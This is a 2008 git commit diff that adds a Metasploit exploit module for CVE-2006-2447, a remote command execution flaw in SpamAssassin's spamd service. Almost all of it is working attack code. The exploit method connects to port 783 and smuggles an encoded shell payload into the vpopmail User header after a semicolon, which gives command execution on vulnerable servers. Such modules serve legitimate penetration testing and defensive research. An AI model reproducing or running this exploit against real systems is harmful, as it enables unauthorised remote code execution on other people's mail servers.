Added spamassassin_exec module.

git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da
2008-07-19 15:40:30 +00:00 · 2008-07-19 15:40:30 +00:00 · 3effb133cc
parent 324703669b
commit 3effb133cc
1 changed files with 76 additions and 0 deletions
--- a/modules/exploits/unix/misc/spamassassin_exec.rb
+++ b/modules/exploits/unix/misc/spamassassin_exec.rb
@ -0,0 +1,76 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Unix::Misc::SpamAssassin_Exec < Msf::Exploit::Remote
+
+	include Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'SpamAssassin spamd Remote Command Execution',
+			'Description'    => %q{
+					This module exploits a flaw in the SpamAssassin spamd service by specifying
+					a malicious vpopmail User header, when running with vpopmail and paranoid
+					modes enabled (non-default). Versions prior to v3.1.3 are vulnerable 
+			},
+			'Author'         => [ 'patrick' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '26177' ],
+					[ 'CVE', '2006-2447' ],
+					[ 'BID', '18290' ],
+					[ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 1024,
+				},
+			'Platform'       => 'unix',
+			'Arch'           => ARCH_CMD,
+			'Targets'        => 
+				[
+					[ 'Automatic', { }],
+				],
+			'DisclosureDate' => 'Jun 06 2006',
+			'DefaultTarget'  => 0))
+
+			register_options(
+			[
+				Opt::RPORT(783)
+			], self.class)
+	end
+
+	def exploit
+		connect
+
+		content = Rex::Text.rand_text_alpha(20)
+
+		sploit = "PROCESS SPAMC/1.2\r\n"
+		sploit << "Content-length: #{(content.length + 2)}\r\n"
+		sploit << "User: ;#{payload.encoded}\r\n\r\n"
+		sploit << content + "\r\n\r\n"
+
+		sock.put(sploit)
+
+		handler
+		disconnect
+	end
+
+end
+end